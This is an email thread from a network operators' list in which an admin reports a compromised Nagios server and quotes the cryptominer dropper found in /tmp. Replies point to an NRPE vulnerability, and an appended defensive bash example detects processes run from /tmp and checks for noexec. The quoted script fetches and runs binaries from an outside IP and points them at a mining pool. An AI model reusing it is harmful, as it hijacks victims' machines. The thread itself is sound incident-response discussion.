Hi Tom,

Yeah, see this:

http://www.opsview.com/forum/opsview-core/bug-reports/nrpe-215-vulnerability

and this from a reply to the abuse email of the IP address range used:

http://krebsonsecurity.com/2013/07/botcoin-bitcoin-mining-by-botnet/

Thanks.

On 21 April 2014 16:04, Tom Storey <[email protected]> wrote:
> Probably also worth making /tmp noexec so that stuff like this has a
> harder time getting started.
>
> On 20 April 2014 20:14, Gary Steers <[email protected]> wrote:
>> All,
>>
>> This looks like it's some form of cryptocurrency miner, "xptMiner.exe"; I think
>> that one's a RieCoin one...
>>
>> Undoubtedly the servers in use are compromised in some way, but it may be worth
>> an abuse message to the contact on the RIR record in whois?
>>
>> Gavin, have sent you an e-mail off topic as well with a little more info,
>> hope it was useful.
>>
>> ---
>> Gary Steers
>> Chief Network Engineer | Boosty
>>
>>
>> On 20 April 2014 19:56, Gavin Henry <[email protected]> wrote:
>>>
>>> Hi all,
>>>
>>> Not usually a post you see on uknof, but I wanted some help and to check
>>> if anyone else has seen this?
>>>
>>> We've just started getting alerts from one of our servers for high load
>>> and discovered a weird process:
>>>
>>> nagios 285936 0.0 0.0 10744 1468 ? S 19:03 0:00 bash /tmp/toplel
>>> nagios 292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s 2965706752
>>>
>>>
>>> root@hostname:/tmp# ls -lh
>>> total 1016K
>>> -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 lllll
>>> -rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel
>>> -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t
>>>
>>>
>>> No idea where it came from. All our stuff has OpenSSL updated, as is
>>> our Nagios.
>>> w00t is a binary; toplel is a bash script containing:
>>>
>>> #!/bin/bash
>>> if [ $1 -le 10 ] ; then
>>> NUM = $(expr $1 + 1)
>>> nohup bash $0 $NUM >/dev/null 2>&1 &
>>> exit
>>> fi
>>> CORECOUNT=$(cat /proc/cpuinfo | grep -c processor)
>>> FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}')
>>> FREE=$(expr $FREE - 52428800)
>>> FREE=$(expr $FREE / $CORECOUNT)
>>>
>>> while true; do
>>> killall w00t
>>> wget http://162.213.24.40/nope-sse4 -O /tmp/w00t
>>> chmod 777 /tmp/w00t
>>> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE
>>>
>>> wget http://162.213.24.40/nope-nse4 -O /tmp/w00t
>>> chmod 777 /tmp/w00t
>>> /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s $FREE
>>>
>>> sleep 300
>>> done;
>>>
>>>
>>>
>>> --
>>> Kind Regards,
>>> Gavin Henry.
>>>
>>

--
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 1224 279484
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E [email protected]

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/
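As an added example (not code from the thread or from any of its posters), two bash functions for the defender's side of what Gavin found and Tom suggested: spotting processes that a service account like nagios runs out of /tmp, and checking whether /tmp really carries noexec. The `ps -eo user,pid,args` input format and the sample mount lines are assumptions.

```shell
#!/bin/bash
# Added example, not code from the thread. Two defender-side checks for what
# the thread describes: a service account running a freshly downloaded
# binary out of /tmp, and Tom's suggestion of mounting /tmp noexec.
# Both read text on stdin so they also work on a captured listing.

# Print process lines whose command, or the script handed to an
# interpreter, lives under a world-writable scratch directory.
# Expected input format (an assumption): `ps -eo user,pid,args`,
# i.e. $1=user $2=pid $3=command $4...=arguments.
flag_scratch_execs() {
    awk -v dirs='^/(tmp|var/tmp|dev/shm)/' \
        -v interp='(^|/)(bash|sh|dash|perl|python[0-9.]*)$' '
        $3 ~ dirs                 { print; next }   # binary itself in /tmp
        $3 ~ interp && $4 ~ dirs  { print }         # e.g. "bash /tmp/toplel"
    '
}

# Return 0 if the mount covering the given path carries noexec, 1 otherwise.
# Reads /proc/self/mounts-style lines on stdin (device mountpoint fstype
# options ...) and uses the longest mount point that is a prefix of the path,
# so a plain "/" mount does not hide a separately mounted /tmp.
mount_is_noexec() {
    awk -v t="$1" '
        {
            mp = $2; opts = $4
            if (mp == "/" || t == mp || index(t, mp "/") == 1)
                if (length(mp) > length(best)) { best = mp; bestopts = opts }
        }
        END {
            n = split(bestopts, a, ",")
            for (i = 1; i <= n; i++) if (a[i] == "noexec") exit 0
            exit 1
        }'
}
```

On a live Linux host, run `ps -eo user,pid,args | flag_scratch_execs` and `mount_is_noexec /tmp < /proc/self/mounts`; a non-empty first result or a non-zero second one is worth a look.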
